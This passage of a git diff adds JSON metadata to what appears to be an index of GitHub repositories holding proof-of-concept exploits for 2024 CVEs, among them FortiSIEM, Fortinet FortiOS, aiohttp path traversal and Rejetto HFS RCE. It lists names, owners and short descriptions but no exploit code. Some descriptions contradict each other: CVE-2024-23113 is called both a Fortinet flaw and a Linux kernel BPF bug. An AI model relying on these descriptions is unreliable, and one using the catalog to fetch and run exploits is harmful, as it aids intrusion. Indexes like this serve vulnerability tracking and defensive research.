"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keru6k\/CVE-2024-22983", + "description": "An SQL injection Vulnerability in projectworlds' Visitor Management System", + "fork": false, + "created_at": "2024-01-25T10:05:00Z", + "updated_at": "2024-01-25T10:05:00Z", + "pushed_at": "2024-02-17T12:05:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23002.json b/2024/CVE-2024-23002.json new file mode 100644 index 0000000000..7938ae0373 --- /dev/null +++ b/2024/CVE-2024-23002.json @@ -0,0 +1,33 @@ +[ + { + "id": 825318356, + "name": "CVE-2024-23002", + "full_name": "xiaomaoxxx\/CVE-2024-23002", + "owner": { + "login": "xiaomaoxxx", + "id": 99456979, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99456979?v=4", + "html_url": "https:\/\/github.com\/xiaomaoxxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaomaoxxx\/CVE-2024-23002", + "description": "this is test POC for git_rce ", + "fork": false, + "created_at": "2024-07-07T12:55:29Z", + "updated_at": "2024-07-07T13:18:11Z", + "pushed_at": "2024-07-07T13:18:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23108.json b/2024/CVE-2024-23108.json new file mode 100644 index 0000000000..9dacc10fd8 --- /dev/null +++ b/2024/CVE-2024-23108.json @@ -0,0 +1,64 @@ +[ + { + "id": 803339715, + "name": "CVE-2024-23108", + "full_name": "horizon3ai\/CVE-2024-23108", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-23108", + "description": "CVE-2024-23108: Fortinet FortiSIEM Unauthenticated 2nd Order Command Injection", + "fork": false, + "created_at": "2024-05-20T14:34:09Z", + "updated_at": "2024-11-20T16:30:47Z", + "pushed_at": "2024-05-21T11:56:19Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 31, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 807218249, + "name": "CVE-2024-23108", + "full_name": "hitem\/CVE-2024-23108", + "owner": { + "login": "hitem", + "id": 8977898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8977898?v=4", + "html_url": "https:\/\/github.com\/hitem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hitem\/CVE-2024-23108", + "description": "POC iteration for CVE-2024-23108 which can use -l for list input", + "fork": false, + "created_at": "2024-05-28T17:21:11Z", + "updated_at": "2024-06-19T15:35:27Z", + "pushed_at": "2024-05-28T17:36:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23113.json b/2024/CVE-2024-23113.json new file mode 100644 index 0000000000..c83a6ae902 --- /dev/null +++ b/2024/CVE-2024-23113.json @@ -0,0 +1,224 @@ +[ + { + "id": 871074826, + "name": "cve-2024-23113", + "full_name": "OxLmahdi\/cve-2024-23113", + "owner": { + "login": "OxLmahdi", + "id": 159675795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159675795?v=4", + "html_url": "https:\/\/github.com\/OxLmahdi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OxLmahdi\/cve-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-10-11T08:13:10Z", + "updated_at": "2024-10-11T08:33:58Z", + "pushed_at": "2024-10-11T08:33:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871254396, + "name": "CVE-2024-23113", + "full_name": "CheckCve2\/CVE-2024-23113", + "owner": { + "login": "CheckCve2", + "id": 184666422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184666422?v=4", + "html_url": "https:\/\/github.com\/CheckCve2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CheckCve2\/CVE-2024-23113", + "description": "test_private_CVE", + "fork": false, + "created_at": "2024-10-11T15:16:00Z", + "updated_at": "2024-10-11T15:49:21Z", + "pushed_at": "2024-10-11T15:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 876057743, + "name": "CVE-2024-23113", + "full_name": "p33d\/CVE-2024-23113", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-10-21T10:27:52Z", + "updated_at": "2024-11-22T23:41:40Z", + "pushed_at": "2024-10-27T17:49:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881252874, + "name": "CVE-2024-23113", + "full_name": "puckiestyle\/CVE-2024-23113", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-10-31T07:44:06Z", + "updated_at": "2024-10-31T07:46:06Z", + "pushed_at": "2024-10-31T07:46:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889028391, + "name": "CVE-2024-23113", + "full_name": "expl0itsecurity\/CVE-2024-23113", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-23113", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:23:19Z", + "updated_at": "2024-11-19T19:03:13Z", + "pushed_at": "2024-11-15T13:25:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892373700, + "name": "cve-2024-23113-exp", + "full_name": "XiaomingX\/cve-2024-23113-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-23113-exp", + "description": "CVE-2024-23113 是一个严重的安全漏洞,影响 Fortinet 的多款产品,包括 FortiOS、FortiProxy、FortiPAM 和 FortiSwitchManager。该漏洞允许未经身份验证的远程攻击者通过特制的请求,在受影响的设备上执行任意代码或命令,可能导致系统被完全控制。", + "fork": false, + "created_at": "2024-11-22T01:46:58Z", + "updated_at": "2024-11-22T09:54:37Z", + "pushed_at": "2024-11-22T01:53:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895404057, + "name": "CVE-2024-23113-poc", + "full_name": "XiaomingX\/CVE-2024-23113-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/CVE-2024-23113-poc", + "description": "CVE-2024-23113 是一个在 Linux Kernel 中被发现的漏洞,它属于 任意代码执行漏洞,影响了 bpf (Berkeley Packet Filter) 子系统。具体来说,这个漏洞影响了 bpf 程序的 bpf_prog 类型的对象,并且可以允许攻击者通过构造恶意的 BPF 程序来在内核空间执行恶意代码。", + "fork": false, + "created_at": "2024-11-28T06:30:02Z", + "updated_at": "2024-11-28T06:35:26Z", + "pushed_at": "2024-11-28T06:35:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23208.json b/2024/CVE-2024-23208.json new file mode 100644 index 0000000000..240db2d3b4 --- /dev/null +++ b/2024/CVE-2024-23208.json @@ -0,0 +1,33 @@ +[ + { + "id": 752559136, + "name": "CVE-2024-23208-test", + "full_name": "hrtowii\/CVE-2024-23208-test", + "owner": { + "login": "hrtowii", + "id": 68852354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68852354?v=4", + "html_url": "https:\/\/github.com\/hrtowii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hrtowii\/CVE-2024-23208-test", + "description": null, + "fork": false, + "created_at": "2024-02-04T07:37:21Z", + "updated_at": "2024-09-23T11:23:29Z", + "pushed_at": "2024-02-05T02:11:42Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 20, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23334.json b/2024/CVE-2024-23334.json new file mode 100644 index 0000000000..0cd088cf92 --- /dev/null +++ b/2024/CVE-2024-23334.json @@ -0,0 +1,346 @@ +[ + { + "id": 764890801, + "name": "CVE-2024-23334", + "full_name": "ox1111\/CVE-2024-23334", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/CVE-2024-23334", + "description": "CVE-2024-23334", + "fork": false, + "created_at": "2024-02-28T22:30:21Z", + "updated_at": "2024-06-17T18:09:45Z", + "pushed_at": "2024-02-29T02:00:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 773320217, + "name": "aiohttp-exploit-CVE-2024-23334-certstream", + "full_name": "sxyrxyy\/aiohttp-exploit-CVE-2024-23334-certstream", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/aiohttp-exploit-CVE-2024-23334-certstream", + "description": null, + "fork": false, + "created_at": "2024-03-17T10:56:02Z", + "updated_at": "2024-06-17T18:09:46Z", + "pushed_at": "2024-03-18T12:25:54Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774035199, + "name": "CVE-2024-23334-PoC", + "full_name": "z3rObyte\/CVE-2024-23334-PoC", + "owner": { + "login": "z3rObyte", + "id": 67548295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67548295?v=4", + "html_url": "https:\/\/github.com\/z3rObyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3rObyte\/CVE-2024-23334-PoC", + "description": "A proof of concept of the path traversal vulnerability in the python AioHTTP library =< 3.9.1", + "fork": false, + "created_at": "2024-03-18T20:39:27Z", + "updated_at": "2024-11-01T03:09:11Z", + "pushed_at": "2024-03-19T06:37:30Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774488632, + "name": "CVE-2024-23334", + "full_name": "jhonnybonny\/CVE-2024-23334", + "owner": { + "login": "jhonnybonny", + "id": 87495218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4", + "html_url": "https:\/\/github.com\/jhonnybonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhonnybonny\/CVE-2024-23334", + "description": "aiohttp LFI (CVE-2024-23334)", + "fork": false, + "created_at": "2024-03-19T16:28:56Z", + "updated_at": "2024-07-29T18:47:24Z", + "pushed_at": "2024-03-19T17:06:26Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792749810, + "name": "poc-cve-2024-23334", + "full_name": "brian-edgar-re\/poc-cve-2024-23334", + "owner": { + "login": "brian-edgar-re", + "id": 111369381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111369381?v=4", + "html_url": "https:\/\/github.com\/brian-edgar-re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brian-edgar-re\/poc-cve-2024-23334", + "description": "This repository contains a proof of concept about the exploitation of the aiohttp library for the reported vulnerability CVE-2024-23334.", + "fork": false, + "created_at": "2024-04-27T13:21:50Z", + "updated_at": "2024-04-29T01:40:19Z", + "pushed_at": "2024-04-29T01:40:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816384401, + "name": "CVE-2024-23334", + "full_name": "binaryninja\/CVE-2024-23334", + "owner": { + "login": "binaryninja", + "id": 5916066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5916066?v=4", + "html_url": "https:\/\/github.com\/binaryninja", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/binaryninja\/CVE-2024-23334", + "description": "Expolit for CVE-2024-23334 (aiohttp >= 1.0.5> && <=3.9.1)", + "fork": false, + "created_at": "2024-06-17T16:28:35Z", + "updated_at": "2024-06-17T21:04:42Z", + "pushed_at": "2024-06-17T16:37:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854072083, + "name": "CVE-2024-23334-PoC", + "full_name": "s4botai\/CVE-2024-23334-PoC", + "owner": { + "login": "s4botai", + "id": 128468264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128468264?v=4", + "html_url": "https:\/\/github.com\/s4botai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4botai\/CVE-2024-23334-PoC", + "description": "A proof of concept of the LFI vulnerability on aiohttp 3.9.1", + "fork": false, + "created_at": "2024-09-08T10:37:29Z", + "updated_at": "2024-11-18T19:28:54Z", + "pushed_at": "2024-09-08T10:49:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash-script", + "cybersecurity" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875667799, + "name": "CVE-2024-23334", + "full_name": "wizarddos\/CVE-2024-23334", + "owner": { + "login": "wizarddos", + "id": 69435721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69435721?v=4", + "html_url": "https:\/\/github.com\/wizarddos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wizarddos\/CVE-2024-23334", + "description": "Proof-of-Concept for LFI\/Path Traversal vulnerability in Aiohttp =< 3.9.1", + "fork": false, + "created_at": "2024-10-20T15:28:58Z", + "updated_at": "2024-11-20T16:31:08Z", + "pushed_at": "2024-10-20T16:48:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885051210, + "name": "CVE-2024-23334", + "full_name": "Pylonet\/CVE-2024-23334", + "owner": { + "login": "Pylonet", + "id": 135266995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135266995?v=4", + "html_url": "https:\/\/github.com\/Pylonet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pylonet\/CVE-2024-23334", + "description": null, + "fork": false, + "created_at": "2024-11-07T21:37:05Z", + "updated_at": "2024-11-24T14:33:40Z", + "pushed_at": "2024-11-24T14:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885827821, + "name": "CVE-2024-23334-PoC", + "full_name": "Arc4he\/CVE-2024-23334-PoC", + "owner": { + "login": "Arc4he", + "id": 168012496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168012496?v=4", + "html_url": "https:\/\/github.com\/Arc4he", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arc4he\/CVE-2024-23334-PoC", + "description": "Proof of concept of the parh traversal in python AioHTTP library =< 3.9.1", + "fork": false, + "created_at": "2024-11-09T13:59:28Z", + "updated_at": "2024-11-20T16:31:09Z", + "pushed_at": "2024-11-09T14:18:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888709297, + "name": "LFI-aiohttp-CVE-2024-23334-PoC", + "full_name": "TheRedP4nther\/LFI-aiohttp-CVE-2024-23334-PoC", + "owner": { + "login": "TheRedP4nther", + "id": 136336480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136336480?v=4", + "html_url": "https:\/\/github.com\/TheRedP4nther", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheRedP4nther\/LFI-aiohttp-CVE-2024-23334-PoC", + "description": "Bash script to automate Local File Inclusion (LFI) attacks on aiohttp server version 3.9.1.", + "fork": false, + "created_at": "2024-11-14T21:43:29Z", + "updated_at": "2024-11-20T17:11:26Z", + "pushed_at": "2024-11-15T16:20:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23339.json b/2024/CVE-2024-23339.json new file mode 100644 index 0000000000..2be7d26aa6 --- /dev/null +++ b/2024/CVE-2024-23339.json @@ -0,0 +1,33 @@ +[ + { + "id": 845356081, + "name": "CVE-2024-23339", + "full_name": "200101WhoAmI\/CVE-2024-23339", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2024-23339", + "description": "pp", + "fork": false, + "created_at": "2024-08-21T05:03:32Z", + "updated_at": "2024-08-21T05:04:55Z", + "pushed_at": "2024-08-21T05:04:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23346.json b/2024/CVE-2024-23346.json new file mode 100644 index 0000000000..a525cfccd3 --- /dev/null +++ b/2024/CVE-2024-23346.json @@ -0,0 +1,33 @@ +[ + { + "id": 883761601, + "name": "CVE-2024-23346", + "full_name": "9carlo6\/CVE-2024-23346", + "owner": { + "login": "9carlo6", + "id": 45871476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45871476?v=4", + "html_url": "https:\/\/github.com\/9carlo6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9carlo6\/CVE-2024-23346", + "description": "This repository contains a Crystallographic Information File (CIF) intended for use on the \"Chemistry\" machine on Hack The Box (HTB).", + "fork": false, + "created_at": "2024-11-05T14:27:06Z", + "updated_at": "2024-11-22T07:59:38Z", + "pushed_at": "2024-11-05T14:32:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23443.json b/2024/CVE-2024-23443.json new file mode 100644 index 0000000000..f2a9913ec8 --- /dev/null +++ b/2024/CVE-2024-23443.json @@ -0,0 +1,33 @@ +[ + { + "id": 759231276, + "name": "osquery_cve-2024-23443", + "full_name": "zhazhalove\/osquery_cve-2024-23443", + "owner": { + "login": "zhazhalove", + "id": 12418559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12418559?v=4", + "html_url": "https:\/\/github.com\/zhazhalove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhazhalove\/osquery_cve-2024-23443", + "description": "Osqery extension HP BIOS WMI", + "fork": false, + "created_at": "2024-02-18T02:15:44Z", + "updated_at": "2024-09-28T12:31:41Z", + "pushed_at": "2024-09-28T12:30:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23652.json b/2024/CVE-2024-23652.json new file mode 100644 index 0000000000..cfab7d7c2a --- /dev/null +++ b/2024/CVE-2024-23652.json @@ -0,0 +1,33 @@ +[ + { + "id": 765626764, + "name": "CVE-2024-23652", + "full_name": "abian2\/CVE-2024-23652", + "owner": { + "login": "abian2", + "id": 156372457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156372457?v=4", + "html_url": "https:\/\/github.com\/abian2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abian2\/CVE-2024-23652", + "description": null, + "fork": false, + "created_at": "2024-03-01T09:50:00Z", + "updated_at": "2024-03-01T09:50:51Z", + "pushed_at": "2024-03-01T09:50:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23692.json b/2024/CVE-2024-23692.json new file mode 100644 index 0000000000..e56470f13d --- /dev/null +++ b/2024/CVE-2024-23692.json @@ -0,0 +1,348 @@ +[ + { + "id": 813486426, + "name": "CVE-2024-23692", + "full_name": "k3lpi3b4nsh33\/CVE-2024-23692", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-23692", + "description": null, + "fork": false, + "created_at": "2024-06-11T07:21:04Z", + "updated_at": "2024-06-14T19:21:27Z", + "pushed_at": "2024-06-11T08:05:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814492032, + "name": "CVE-2024-23692-RCE-in-Rejetto-HFS", + "full_name": "jakabakos\/CVE-2024-23692-RCE-in-Rejetto-HFS", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-23692-RCE-in-Rejetto-HFS", + "description": "Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)", + "fork": false, + "created_at": "2024-06-13T06:00:24Z", + "updated_at": "2024-11-11T12:02:29Z", + "pushed_at": "2024-06-13T07:00:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814570994, + "name": "CVE-2024-23692", + "full_name": "vanboomqi\/CVE-2024-23692", + "owner": { + "login": "vanboomqi", + "id": 97789149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97789149?v=4", + "html_url": "https:\/\/github.com\/vanboomqi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vanboomqi\/CVE-2024-23692", + "description": null, + "fork": false, + "created_at": "2024-06-13T09:12:06Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-15T15:30:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814670168, + "name": "CVE-2024-23692-RCE", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-23692-RCE", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-23692-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-13T13:13:10Z", + "updated_at": "2024-06-13T14:43:57Z", + "pushed_at": "2024-06-13T14:43:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814916351, + "name": "CVE-2024-23692", + "full_name": "Mr-r00t11\/CVE-2024-23692", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-23692", + "description": null, + "fork": false, + "created_at": "2024-06-14T01:33:19Z", + "updated_at": "2024-06-14T01:47:48Z", + "pushed_at": "2024-06-14T01:47:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": 